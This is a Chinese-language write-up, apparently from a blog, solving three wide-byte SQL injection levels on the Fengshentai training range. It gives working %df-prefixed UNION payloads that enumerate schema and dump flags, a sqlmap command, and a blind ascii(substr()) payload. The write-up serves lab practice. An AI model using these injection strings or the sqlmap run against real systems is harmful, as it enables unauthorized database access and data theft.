封神台靶场-宽字节注入

宽字节注入(一)

封神台靶场-宽字节注入

查询数据库名

http://inject2b.lab.aqlab.cn/Pass-15/index.php?id=1%df' union select 1,2,database() -- qwe

得出数据库名:widechar

查询当前库下表名

http://inject2b.lab.aqlab.cn/Pass-15/index.php?id=1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- qwe

得出表名:china_flag,user

查询china_flag表下字段名

http://inject2b.lab.aqlab.cn/Pass-15/index.php?id=1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x6368696e615f666c6167 -- qwe

得出china_flag表下字段名:Id,C_Flag

查询数据

http://inject2b.lab.aqlab.cn/Pass-15/index.php?id=1%df' union select 1,2,group_concat(C_Flag) from china_flag -- qwe

得出flag:zKaQ-Wide,zKaQ-CAIK,zKaQ-Kzj+mz

经验证,zKaQ-Wide为最终flag

宽字节注入(二)

大体注入流程与(一)一样,只不过需要提供的是%df') -- qwe

这里我们直接采用sqlmap进行注入

sqlmap -u "http://inject2b.lab.aqlab.cn/Pass-16/index.php?id=1" --level 3 --risk 2 --batch

得出flag:zKaQ-Wide,zKaQ-CAIK,zKaQ-Kzj+mz

经验证,zKaQ-CAIK为最终flag

宽字节注入(三)

可以采用抓包后修改%25df为%df注入进行测试|提供一个汉字然后') -- qwe进行测试

神') or ascii(substr((select database()),1,1))=119 -- qwe

得出flag:zKaQ-Wide,zKaQ-CAIK,zKaQ-Kzj+mz

经验证,zKaQ-Kzj+mz为最终flag

上一篇:POST注入靶场练习


下一篇:docker根据配置文件启动redis